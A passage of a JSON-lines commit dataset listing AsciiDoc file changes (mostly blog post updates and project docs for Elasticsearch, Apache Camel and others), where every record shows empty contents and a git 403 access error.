Skateboard","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-28-You-Will-Want-This-New-Electric-Skateboard.adoc","new_file":"_posts\/2017-05-28-You-Will-Want-This-New-Electric-Skateboard.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f7822ad544a099cde309a3127a3e09cf7e36a2a","subject":"Add Angular 2 documentation section","message":"Add Angular 2 documentation section\n","repos":"vaadin\/vaadin-upload,vaadin\/vaadin-upload","old_file":"docs\/vaadin-upload-angular2.adoc","new_file":"docs\/vaadin-upload-angular2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vaadin\/vaadin-upload.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73be80ead24e052922896f147003cceb955e0c5e","subject":"Delete the file at '_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc'","message":"Delete the file at '_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_file":"_posts\/2017-05-07-Dont-forget-to-Reduce-the-number-of-Queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"08df169fb2805ce1f19a10e72921af9b23793264","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75550a23ab0c1c9fafdbc73a32fb665eeb689729","subject":"Docs: Fixed bad Shield links","message":"Docs: Fixed bad Shield links\n\nOriginal commit: elastic\/x-pack-elasticsearch@c61133ed12962fc4046642c0727bbc0a394c4b1d\n","repos":"scorpionvicky\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,strapdata\/elassandra,nknize\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,vroyer\/elassandra,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra,GlenRSmith\/elasticsearch,nknize\/elasticsearch,vroyer\/elassandra,coding0011\/elasticsearch,coding0011\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,strapdata\/elassandra,coding0011\/elasticsearch","old_file":"watcher\/docs\/administering-watcher\/integrating-with-shield.asciidoc","new_file":"watcher\/docs\/administering-watcher\/integrating-with-shield.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf5c3855f4598ad77277055bb814ef7524f48cea","subject":"Update 2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","message":"Update 2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","repos":"siarlex\/siarlex.github.io,siarlex\/siarlex.github.io,siarlex\/siarlex.github.io,siarlex\/siarlex.github.io","old_file":"_posts\/2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","new_file":"_posts\/2018-10-30-Solucionar-problema-No-more-space-for-virtual-disk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/siarlex\/siarlex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2429df086ca5844ee524d7f03865578d08ceeac","subject":"update docs","message":"update docs\n","repos":"Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java,Unidata\/netcdf-java","old_file":"docs\/website\/netcdf-java\/reference\/FeatureDatasets\/PointFeatures.adoc","new_file":"docs\/website\/netcdf-java\/reference\/FeatureDatasets\/PointFeatures.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Unidata\/netcdf-java.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"e7bf4d7d933e4ecf2fc198da256bbeb8fb82f88f","subject":"Update 2016-04-08-First-Post.adoc","message":"Update 2016-04-08-First-Post.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-04-08-First-Post.adoc","new_file":"_posts\/2016-04-08-First-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a41ca238d4e206dd94de19d3866b2396f76ca5d2","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e31345353e6d038faa7bed85cacd32b9b7f55b4a","subject":"Update 2020-01-05-dark-blue.adoc","message":"Update 2020-01-05-dark-blue.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2020-01-05-dark-blue.adoc","new_file":"_posts\/2020-01-05-dark-blue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d87870d665d983dbe50c09e99c64a2dd990b2ba0","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21b2d3544cd5fae478785c5f4500e229225453d4","subject":"Update 2015-08-25-Uberkonsum.adoc","message":"Update 2015-08-25-Uberkonsum.adoc","repos":"hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io,hoernschen\/hoernschen.github.io","old_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_file":"_posts\/2015-08-25-Uberkonsum.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hoernschen\/hoernschen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9553106b58280daf6403f4eb7242fce3616ad074","subject":"Delete the file at '_posts\/2016-03-04-New-Server.adoc'","message":"Delete the file at '_posts\/2016-03-04-New-Server.adoc'","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2016-03-04-New-Server.adoc","new_file":"_posts\/2016-03-04-New-Server.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c26e52d2b012cb5764bf192cfa2f05c5637203e","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"00fe13c1d01accb1673b4424e647fc929111f114","subject":"Update 2016-08-23-First-post.adoc","message":"Update 2016-08-23-First-post.adoc","repos":"gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io,gquintana\/gquintana.github.io","old_file":"_posts\/2016-08-23-First-post.adoc","new_file":"_posts\/2016-08-23-First-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gquintana\/gquintana.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28fcdd1a4d1cc3e6488110f5f8436dde05c21b83","subject":"Update 2017-01-01-Blog-Title.adoc","message":"Update 2017-01-01-Blog-Title.adoc","repos":"mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io,mmhchan\/mmhchan.github.io","old_file":"_posts\/2017-01-01-Blog-Title.adoc","new_file":"_posts\/2017-01-01-Blog-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mmhchan\/mmhchan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"87e895bcbda3461a0a8fba557d1172ad7689cd8e","subject":"Update 2017-07-17-Who-We-Are.adoc","message":"Update 2017-07-17-Who-We-Are.adoc","repos":"Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog,Asastry1\/inflect-blog","old_file":"_posts\/2017-07-17-Who-We-Are.adoc","new_file":"_posts\/2017-07-17-Who-We-Are.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Asastry1\/inflect-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e867dfabff8b6d84af4eb9f2a720f766c691d4a1","subject":"[DOCS] Add token filter reference docs template (#52290)","message":"[DOCS] Add token filter reference docs template (#52290)\n\nCreates a reusable template for token filter reference documentation.\r\n\r\nContributors can make a copy of this template and customize it when\r\ndocumenting new token filters.","repos":"gingerwizard\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch","old_file":"docs\/reference\/analysis\/tokenfilters\/_token-filter-template.asciidoc","new_file":"docs\/reference\/analysis\/tokenfilters\/_token-filter-template.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1076685abbcfd27b438fb1a591bd8d5da6048f16","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16b4d7854501ceb04038b2787a87175ba3b466c4","subject":"Added secureXML Dataformat docs to Gitbook","message":"Added secureXML Dataformat docs to Gitbook\n","repos":"jamesnetherton\/camel,tkopczynski\/camel,sabre1041\/camel,alvinkwekel\/camel,punkhorn\/camel-upstream,driseley\/camel,nicolaferraro\/camel,zregvart\/camel,gnodet\/camel,prashant2402\/camel,adessaigne\/camel,akhettar\/camel,prashant2402\/camel,scranton\/camel,neoramon\/camel,mgyongyosi\/camel,objectiser\/camel,prashant2402\/camel,NickCis\/camel,mcollovati\/camel,pkletsko\/camel,bgaudaen\/camel,scranton\/camel,driseley\/camel,dmvolod\/camel,dmvolod\/camel,tkopczynski\/camel,gnodet\/camel,adessaigne\/camel,gilfernandes\/camel,nicolaferraro\/camel,jkorab\/camel,kevinearls\/camel,jonmcewen\/camel,NickCis\/camel,nboukhed\/camel,pmoerenhout\/camel,scranton\/camel,davidkarlsen\/camel,cunningt\/camel,onders86\/camel,christophd\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,salikjan\/camel,tlehoux\/camel,tdiesler\/camel,ssharma\/camel,gilfernandes\/camel,DariusX\/camel,gilfernandes\/camel,pax95\/camel,pkletsko\/camel,yuruki\/camel,hqstevenson\/camel,jkorab\/camel,dmvolod\/camel,Thopap\/camel,snurmine\/camel,tadayosi\/camel,bgaudaen\/camel,Thopap\/camel,CodeSmell\/camel,gautric\/camel,anoordover\/camel,Thopap\/camel,Thopap\/camel,onders86\/camel,mgyongyosi\/camel,pmoerenhout\/camel,anoordover\/camel,prashant2402\/camel,tdiesler\/camel,jamesnetherton\/camel,pkletsko\/camel,jamesnetherton\/camel,tadayosi\/camel,jkorab\/camel,cunningt\/camel,rmarting\/camel,allancth\/camel,tadayosi\/camel,rmarting\/camel,driseley\/camel,lburgazzoli\/camel,chirino\/camel,apache\/camel,christophd\/camel,allancth\/camel,anoordover\/camel,tadayosi\/camel,lburgazzoli\/apache-camel,jkorab\/camel,jamesnetherton\/camel,jkorab\/camel,tadayosi\/camel,jarst\/camel,apache\/camel,gautric\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,drsquidop\/camel,JYBESSON\/camel,yuruki\/camel,tdiesler\/camel,tlehoux\/camel,snurmine\/camel,ullgren\/camel,chirino\/camel,nicolaferraro\/camel,JYBESSON\/camel,bhaveshdt\/camel,adessaigne\/camel,lburgazzoli\/apache-camel,onders86\/camel,gautric\/camel,tlehoux\/camel,gautric\/camel,acartapanis\/camel,nboukhed\/camel,rmarting\/camel,sirlatrom\/camel,sabre1041\/camel,jonmcewen\/camel,w4tson\/camel,gilfernandes\/camel,prashant2402\/camel,bhaveshdt\/camel,tlehoux\/camel,veithen\/camel,w4tson\/camel,bhaveshdt\/camel,rmarting\/camel,pax95\/camel,adessaigne\/camel,tkopczynski\/camel,adessaigne\/camel,objectiser\/camel,sabre1041\/camel,isavin\/camel,scranton\/camel,pmoerenhout\/camel,hqstevenson\/camel,curso007\/camel,sirlatrom\/camel,sirlatrom\/camel,drsquidop\/camel,anoordover\/camel,NickCis\/camel,chirino\/camel,bhaveshdt\/camel,isavin\/camel,jamesnetherton\/camel,cunningt\/camel,mcollovati\/camel,bgaudaen\/camel,isavin\/camel,mgyongyosi\/camel,Fabryprog\/camel,JYBESSON\/camel,nicolaferraro\/camel,mgyongyosi\/camel,JYBESSON\/camel,neoramon\/camel,pmoerenhout\/camel,drsquidop\/camel,nikhilvibhav\/camel,anton-k11\/camel,tkopczynski\/camel,akhettar\/camel,w4tson\/camel,drsquidop\/camel,sverkera\/camel,jarst\/camel,onders86\/camel,mcollovati\/camel,acartapanis\/camel,RohanHart\/camel,chirino\/camel,pkletsko\/camel,sirlatrom\/camel,lburgazzoli\/camel,chirino\/camel,adessaigne\/camel,dmvolod\/camel,anoordover\/camel,sabre1041\/camel,anton-k11\/camel,acartapanis\/camel,allancth\/camel,nikhilvibhav\/camel,akhettar\/camel,Thopap\/camel,christophd\/camel,DariusX\/camel,cunningt\/camel,dmvolod\/camel,chirino\/camel,rmarting\/camel,apache\/camel,mgyongyosi\/camel,gilfernandes\/camel,apache\/camel,snurmine\/camel,mcollovati\/camel,jkorab\/camel,sabre1041\/camel,curso007\/camel,yuruki\/camel,CodeSmell\/camel,lburgazzoli\/apache-camel,cunningt\/camel,bhaveshdt\/camel,drsquidop\/camel,w4tson\/camel,isavin\/camel,JYBESSON\/camel,tdiesler\/camel,Fabryprog\/camel,allancth\/camel,yuruki\/camel,zregvart\/camel,acartapanis\/camel,gilfernandes\/camel,bhaveshdt\/camel,pkletsko\/camel,snurmine\/camel,Thopap\/camel,hqstevenson\/camel,jonmcewen\/camel,lburgazzoli\/camel,ssharma\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,curso007\/camel,punkhorn\/camel-upstream,akhettar\/camel,veithen\/camel,apache\/camel,gnodet\/camel,christophd\/camel,veithen\/camel,w4tson\/camel,snurmine\/camel,veithen\/camel,anoordover\/camel,apache\/camel,CodeSmell\/camel,DariusX\/camel,ullgren\/camel,neoramon\/camel,drsquidop\/camel,sirlatrom\/camel,jarst\/camel,nboukhed\/camel,anton-k11\/camel,pax95\/camel,hqstevenson\/camel,sverkera\/camel,tadayosi\/camel,davidkarlsen\/camel,lburgazzoli\/camel,lburgazzoli\/apache-camel,allancth\/camel,cunningt\/camel,jonmcewen\/camel,zregvart\/camel,RohanHart\/camel,hqstevenson\/camel,kevinearls\/camel,RohanHart\/camel,driseley\/camel,lburgazzoli\/apache-camel,NickCis\/camel,Fabryprog\/camel,jamesnetherton\/camel,NickCis\/camel,akhettar\/camel,christophd\/camel,tlehoux\/camel,sverkera\/camel,ssharma\/camel,zregvart\/camel,objectiser\/camel,bgaudaen\/camel,veithen\/camel,sverkera\/camel,Fabryprog\/camel,sverkera\/camel,anton-k11\/camel,RohanHart\/camel,pmoerenhout\/camel,driseley\/camel,ssharma\/camel,NickCis\/camel,gautric\/camel,salikjan\/camel,w4tson\/camel,pmoerenhout\/camel,jarst\/camel,bgaudaen\/camel,kevinearls\/camel,jarst\/camel,RohanHart\/camel,scranton\/camel,CodeSmell\/camel,neoramon\/camel,RohanHart\/camel,rmarting\/camel,scranton\/camel,mgyongyosi\/camel,alvinkwekel\/camel,pkletsko\/camel,onders86\/camel,lburgazzoli\/camel,curso007\/camel,JYBESSON\/camel,sabre1041\/camel,gautric\/camel,tlehoux\/camel,alvinkwekel\/camel,DariusX\/camel,snurmine\/camel,tkopczynski\/camel,alvinkwekel\/camel,christophd\/camel,anton-k11\/camel,onders86\/camel,tkopczynski\/camel,kevinearls\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,yuruki\/camel,jonmcewen\/camel,sirlatrom\/camel,ssharma\/camel,veithen\/camel,ssharma\/camel,acartapanis\/camel,curso007\/camel,allancth\/camel,jarst\/camel,neoramon\/camel,driseley\/camel,tdiesler\/camel,kevinearls\/camel,yuruki\/camel,ullgren\/camel,ullgren\/camel,prashant2402\/camel,isavin\/camel,jonmcewen\/camel,pax95\/camel,dmvolod\/camel,sverkera\/camel,isavin\/camel,neoramon\/camel,objectiser\/camel,nboukhed\/camel,nikhilvibhav\/camel,akhettar\/camel,nboukhed\/camel,gnodet\/camel,lburgazzoli\/camel,hqstevenson\/camel,nboukhed\/camel,anton-k11\/camel,acartapanis\/camel,punkhorn\/camel-upstream,kevinearls\/camel,pax95\/camel,curso007\/camel","old_file":"components\/camel-xmlsecurity\/src\/main\/docs\/secureXML-dataformat.adoc","new_file":"components\/camel-xmlsecurity\/src\/main\/docs\/secureXML-dataformat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4d7c85bca00406d9b77b5d9813c87b93bb52370d","subject":"Update 2015-08-24-Second-post.adoc","message":"Update 2015-08-24-Second-post.adoc","repos":"pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io,pascalgrimaud\/hubpress.io","old_file":"_posts\/2015-08-24-Second-post.adoc","new_file":"_posts\/2015-08-24-Second-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pascalgrimaud\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7da08da3e678631de05ba838388718d3d022369f","subject":"Update 2016-12-01-hello-world.adoc","message":"Update 2016-12-01-hello-world.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2016-12-01-hello-world.adoc","new_file":"_posts\/2016-12-01-hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9d7aca5324a523ef1c4eb6a107b2aaeac0fa6046","subject":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","message":"Update 2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_file":"_posts\/2016-04-07-Eficiencia-de-algoritmos-parte-I-I-Que-la-fuerza-te-acompane.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"370689acd143618f4606e8be9855607836a314f1","subject":"never used this one","message":"never used this one\n","repos":"rotty3000\/papersntalks,rotty3000\/papersntalks,rotty3000\/papersntalks","old_file":"2014\/NAS\/LiferayPlatform.adoc","new_file":"2014\/NAS\/LiferayPlatform.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rotty3000\/papersntalks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"488bd2d2366cbc1c7416c36e229eded2f86a8124","subject":"Update 2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","message":"Update 2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","new_file":"_posts\/2015-04-12-DAsciidoctor-a-HubPress-mon-opensource-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cb07ad0bb753c2be24545d52828797ed1ea97c","subject":"Update 2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Update 2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"_posts\/2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"_posts\/2016-05-22-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7c0b722b8dd5c90e1fd08f1e12c56600fca8cab","subject":"Added README.adoc symlink","message":"Added README.adoc symlink\n","repos":"Yubico\/yubico-java-client,Yubico\/yubico-java-client","old_file":"v2client\/README.adoc","new_file":"v2client\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Yubico\/yubico-java-client.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"39a445663fac6452192f81c0b2476230482503dc","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0d2dae0953666b85bcbb85878d9f5629692afb1c","subject":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","message":"Update 2015-09-30-Multithreading-and-Parallel-Programming.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_file":"_posts\/2015-09-30-Multithreading-and-Parallel-Programming.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dce759670e7c40e360d69e5477c43348487346ea","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54aae8fd95c3f21d6ca21f4265d7677221d9a25d","subject":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","message":"Update 2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_file":"_posts\/2016-07-20-JS-Geo-Mapping-Adding-Dynamic-State-and-Filters.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 